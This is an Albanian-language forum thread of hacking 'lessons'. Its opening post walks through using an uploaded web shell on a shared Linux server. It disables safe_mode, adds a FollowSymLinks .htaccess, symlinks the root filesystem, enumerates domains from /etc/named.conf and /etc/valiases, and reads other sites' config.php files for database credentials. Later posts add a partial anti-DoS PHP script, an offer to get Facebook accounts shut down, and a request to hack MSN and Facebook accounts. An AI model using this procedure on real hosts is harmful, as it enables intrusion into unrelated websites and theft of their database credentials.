Engjujt Shqipetare Forum/portal
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Shko poshtë
Unknown
Unknown
Komplet
Komplet
 <b>Gjinia</b> Gjinia : Male
<b>Shteti</b> Shteti : Greece
 <b>Mosha</b> Mosha : 30
<b>Postime</b> Postime : 1419
<b>Hobi</b> Hobi : Gjerat e veshtira ...
 <b>Vendndodhja</b> Vendndodhja : grecce
<b>Anetaresuar</b> Anetaresuar : 04/12/2011

default Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:08
Pershendetje
Sot do ju Tregoj se si te bejm symlink ne nje Server Linux

kemi nje shell ne nje server Linux Safe_mode= OFF Nqs esht ON ather beni kte

" hap nje file php.ini dhe shkruaj
safe_mode= off " Ruaje: dhe fute aty ku ke shellin
ne rastin tim
http://www.website.com/php.ini
SHELLI:
http://www.website.com/shell.php
dhe direktori :
/home/ueb/public_html/

tani krijojm nje direktory kur do bejm Bypass Serverin Si root

shkojm tek shell Exec: mkdir ahc

klikojm tek Direktori ahc

Krijojm Filen .htaccess
"KUJDES: krijojeni .htaceess'in tek direktory qe krijuam "/ahc" jo aty ku kemi shellin sepse ju prishet faqa"

shtojm kte kodin
Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php


bejm tek shell Exec kte komande: ln -s / root

tani shkojm : http://www.website.com/ahc/root/
nqs nuk na nxjerr forbidden aty ather jemi OK deri ktu.

shkojm prap kte shelli te gjejm domainet " ka shum scripte ose webe qe i tregojn po un do tregoj menyren time "

bejm tek Shell Exec: cat /etc/named.conf

do na dalin tgjith domainet e ati Serveri

marrim domain dhe bejm kte Komand tek Shell Exec: ls -la /etc/valiases/domain.com

dhe na tel useri :=)

marrim user shkojm : http://www.website.com/ahc/root/home/...config.php view-source:$config.php [OK]

Lidhuni Me databasen me ane te shellit ose perdorni DB tools!

mepas e dini vet ca ndodh

Met mira :=)


Leximi për mendjen është si gjimnastika për trupin ...
Anabel
Anabel
Fondatore Forumi
Fondatore Forumi
 <b>Gjinia</b> Gjinia : Female
<b>Shteti</b> Shteti : Greece
<b>Postime</b> Postime : 88355
<b>Anetaresuar</b> Anetaresuar : 22/01/2010
http://www.engjujtshqiptare.com/

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:10
Anonim jane pak te rrezikshme keto mo xhan se jo gjithkush i perdor aty ku duhet pasi i keqperdorin njohurite qe sjell per inate ne website te tjera pa lidhje....


Mesime Per Hack .. Engjuj17
Portali ~ Forumi ~ St@ff ~ Rregulloria Forumit

Keni paqartesi... Me kontakto ne PM
Calypso
Calypso
Princeshe Forumi
Princeshe Forumi
 <b>Gjinia</b> Gjinia : Female
<b>Shteti</b> Shteti : Greece
<b>Postime</b> Postime : 36630
<b>Hobi</b> Hobi : shkrimi
 <b>Vendndodhja</b> Vendndodhja : ne hapat e jetes
<b>Anetaresuar</b> Anetaresuar : 21/05/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:11
rrespekt ....dhe pak do na kesh me hy ne kurs ktu tek ti ..... :N


*Gabojme gjithmone . Gabojme nga inati . Gabojme per te mesuar . Mesojme qe te mos perserisim kurre disa gabi me!!!
*E αdmiroj zemren time,shume here eshte plαgosur ngα dαshuria dhe miqesiα,por prαpe kα forcen te rrαhe fort!!!
*Ajo qe te tjert menojne per ty, nuk te perket!!!
*Mos krahaso jeten tane me te tjerve, sepse nuk e ke iden se si asht udhetimi tyne!!!
*Buzeqesh, sepse nuk i ke te tana hallet e botes mbi veten tane!!!

Mesime Per Hack .. N
Unknown
Unknown
Komplet
Komplet
 <b>Gjinia</b> Gjinia : Male
<b>Shteti</b> Shteti : Greece
 <b>Mosha</b> Mosha : 30
<b>Postime</b> Postime : 1419
<b>Hobi</b> Hobi : Gjerat e veshtira ...
 <b>Vendndodhja</b> Vendndodhja : grecce
<b>Anetaresuar</b> Anetaresuar : 04/12/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:14
Mbro Webin Nga Dos & Ddos !!!

Ckemi miq!
Sot do ju tregoj 1 menyr , si te mbrojm Faqen tone Nga Ddos & dos

Mundesuar Nga: ReSpEcT (AHC)

Marrim Scriptin
PHP Code:

/*
CHMOD /iplog/ to 777
Create and CHMOD /iplog/iplogfile.dat to 666
add the following line in any important .php file in the same directory as your anti_dos.php file so it can check IPs when that file is loaded, best example is index.php if you have it.
include("anti_dos.php"); //anti-DoS, prevents rapid accessing

if you have a known cookie on your site,
you can use this, otherwise just ignore this, it will set a different limit


E ruajme Si Antiddos.php dhe e uploadojm ne host !!

Tani Hapim 1 Direktory PSH: /antiddos/ dhe Futemi Nte

1: Krijojm 1 File iplog.dat ose Ipattackers.txt (ose cfardo emri)
2: Bejm CHMOD 777 Folderin /antiddos/ dhe CHMOD 666 iplog.dat(Ipattackers.txt)

$iplogdir = "./antiddos/";
$iplogfile = "iplog.dat";

mbasi tkemi bo kto te dyja Fusim HTACCESS Direktory Protection (Bejm Direktoryn Me Password) Qe te kesh akses vetem ti ne ate direktori

Tani hapim cdo File Qe ka Scripti Dhe fusim ne fund

PHP Code:
include("Antiddos.php"); //Anti Ddos Protection


jepim Refresh Index.php nja 5 6 her dhe Shikoni ne folderin /antiddos/ ! :=)


PS: Ky script Ngadalso Trafikun Nga 1 Ip , Nqs Ai ip Fillon Po Ate sulm E bllokon Per Minuta Te tera!!


Shpresojm Tju Kem Ndihmuar ..

BESOJ se kjo e dyta ka lidhje me web tuaj !!


Leximi për mendjen është si gjimnastika për trupin ...
Calypso
Calypso
Princeshe Forumi
Princeshe Forumi
 <b>Gjinia</b> Gjinia : Female
<b>Shteti</b> Shteti : Greece
<b>Postime</b> Postime : 36630
<b>Hobi</b> Hobi : shkrimi
 <b>Vendndodhja</b> Vendndodhja : ne hapat e jetes
<b>Anetaresuar</b> Anetaresuar : 21/05/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:20
mesus je njish ...ivodha qysh tash une kto i futa ne arkiven time


*Gabojme gjithmone . Gabojme nga inati . Gabojme per te mesuar . Mesojme qe te mos perserisim kurre disa gabi me!!!
*E αdmiroj zemren time,shume here eshte plαgosur ngα dαshuria dhe miqesiα,por prαpe kα forcen te rrαhe fort!!!
*Ajo qe te tjert menojne per ty, nuk te perket!!!
*Mos krahaso jeten tane me te tjerve, sepse nuk e ke iden se si asht udhetimi tyne!!!
*Buzeqesh, sepse nuk i ke te tana hallet e botes mbi veten tane!!!

Mesime Per Hack .. N
Unknown
Unknown
Komplet
Komplet
 <b>Gjinia</b> Gjinia : Male
<b>Shteti</b> Shteti : Greece
 <b>Mosha</b> Mosha : 30
<b>Postime</b> Postime : 1419
<b>Hobi</b> Hobi : Gjerat e veshtira ...
 <b>Vendndodhja</b> Vendndodhja : grecce
<b>Anetaresuar</b> Anetaresuar : 04/12/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:22
Selda shkruajti:mesus je njish ...ivodha qysh tash une kto i futa ne arkiven time

kto jane elementa .. ty do te bej ... mesim papagese Very Happy
Mesime Per Hack .. 1286751612 Mesime Per Hack .. 1286751612 Mesime Per Hack .. 1286751612 Mesime Per Hack .. 1286751612


Leximi për mendjen është si gjimnastika për trupin ...
Calypso
Calypso
Princeshe Forumi
Princeshe Forumi
 <b>Gjinia</b> Gjinia : Female
<b>Shteti</b> Shteti : Greece
<b>Postime</b> Postime : 36630
<b>Hobi</b> Hobi : shkrimi
 <b>Vendndodhja</b> Vendndodhja : ne hapat e jetes
<b>Anetaresuar</b> Anetaresuar : 21/05/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:24
pse kujton se do marresh lekt prej ne qe jetojme ktu ne greqi...ne jena ne krize nuk e shikon qe marrim borxhe? Mesime Per Hack .. 113209097


*Gabojme gjithmone . Gabojme nga inati . Gabojme per te mesuar . Mesojme qe te mos perserisim kurre disa gabi me!!!
*E αdmiroj zemren time,shume here eshte plαgosur ngα dαshuria dhe miqesiα,por prαpe kα forcen te rrαhe fort!!!
*Ajo qe te tjert menojne per ty, nuk te perket!!!
*Mos krahaso jeten tane me te tjerve, sepse nuk e ke iden se si asht udhetimi tyne!!!
*Buzeqesh, sepse nuk i ke te tana hallet e botes mbi veten tane!!!

Mesime Per Hack .. N
Unknown
Unknown
Komplet
Komplet
 <b>Gjinia</b> Gjinia : Male
<b>Shteti</b> Shteti : Greece
 <b>Mosha</b> Mosha : 30
<b>Postime</b> Postime : 1419
<b>Hobi</b> Hobi : Gjerat e veshtira ...
 <b>Vendndodhja</b> Vendndodhja : grecce
<b>Anetaresuar</b> Anetaresuar : 04/12/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:25
Selda shkruajti:pse kujton se do marresh lekt prej ne qe jetojme ktu ne greqi...ne jena ne krize nuk e shikon qe marrim borxhe? Mesime Per Hack .. 113209097


pa merak .. fare .. he se do e gjejme nje menyre .. ena cafe ... kernaw panda egw... ama theles etsi.. alios dn ginete Mesime Per Hack .. 1286751612


Leximi për mendjen është si gjimnastika për trupin ...
Unknown
Unknown
Komplet
Komplet
 <b>Gjinia</b> Gjinia : Male
<b>Shteti</b> Shteti : Greece
 <b>Mosha</b> Mosha : 30
<b>Postime</b> Postime : 1419
<b>Hobi</b> Hobi : Gjerat e veshtira ...
 <b>Vendndodhja</b> Vendndodhja : grecce
<b>Anetaresuar</b> Anetaresuar : 04/12/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:27
Kush ka ndonje ankese ne baze te facebook .. qe do te mbyll dokujt fcb .. ose ndonje facebook .. jo real .. per cdo person ... mund ta help :)


Leximi për mendjen është si gjimnastika për trupin ...
Calypso
Calypso
Princeshe Forumi
Princeshe Forumi
 <b>Gjinia</b> Gjinia : Female
<b>Shteti</b> Shteti : Greece
<b>Postime</b> Postime : 36630
<b>Hobi</b> Hobi : shkrimi
 <b>Vendndodhja</b> Vendndodhja : ne hapat e jetes
<b>Anetaresuar</b> Anetaresuar : 21/05/2011

default Re: Mesime Per Hack ..

prej Fri 23 Mar 2012 - 20:27
ReSpEcT shkruajti:
Selda shkruajti:pse kujton se do marresh lekt prej ne qe jetojme ktu ne greqi...ne jena ne krize nuk e shikon qe marrim borxhe? Mesime Per Hack .. 113209097


pa merak .. fare .. he se do e gjejme nje menyre .. ena cafe ... kernaw panda egw... ama theles etsi.. alios dn ginete Mesime Per Hack .. 1286751612

grrrr grrrr grrrr grrrr grrrr grrrr grrrr grrrr grrrr grrrr faleminers per kto qe solle


*Gabojme gjithmone . Gabojme nga inati . Gabojme per te mesuar . Mesojme qe te mos perserisim kurre disa gabi me!!!
*E αdmiroj zemren time,shume here eshte plαgosur ngα dαshuria dhe miqesiα,por prαpe kα forcen te rrαhe fort!!!
*Ajo qe te tjert menojne per ty, nuk te perket!!!
*Mos krahaso jeten tane me te tjerve, sepse nuk e ke iden se si asht udhetimi tyne!!!
*Buzeqesh, sepse nuk i ke te tana hallet e botes mbi veten tane!!!

Mesime Per Hack .. N
admin
admin
Anetari ri
Anetari ri
 <b>Gjinia</b> Gjinia : Male
 <b>Mosha</b> Mosha : 24
<b>Postime</b> Postime : 2
<b>Anetaresuar</b> Anetaresuar : 05/09/2013

default Qkemi tgjith

prej Thu 5 Sep 2013 - 10:13
Qkemi Un jam nga prsihtina jam regjistrur i ri tek ju un kam qef qe te msona me hack nje Msn dhe nje Facebook do te kishit mujtur te me tregon kisha pasur shumm deshir te madhe ?
W0rld
W0rld
V.I.P Forumi
V.I.P  Forumi
 <b>Gjinia</b> Gjinia : Male
<b>Shteti</b> Shteti : Shqipëria
 <b>Mosha</b> Mosha : 31
<b>Postime</b> Postime : 570
<b>Hobi</b> Hobi : Muzika,leximi&stervitja
 <b>Vendndodhja</b> Vendndodhja : In Your Dreams!
<b>Anetaresuar</b> Anetaresuar : 14/04/2013

default Re: Mesime Per Hack ..

prej Thu 5 Sep 2013 - 11:47
Mos enderroni kot dhe mos i besoni atyre qe bejne si te ditur, te perdoresh fjalen "HACK" kur behet fjale per nje password emaili eshte ca si teper.

Ne tevertete, me sa di une, egzistojne vetem truke te cilet ja "fusin" viktimes dhe ai me duart e veta dhe pa dashur e shkruan passwordin e tij tek "hackeri".I lutem atyre që kanë shumë fytyra, jepjani ndonjë fytyrë atyre që s'kanë fare !
Sponsored content

default Re: Mesime Per Hack ..

Mbrapsht në krye
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi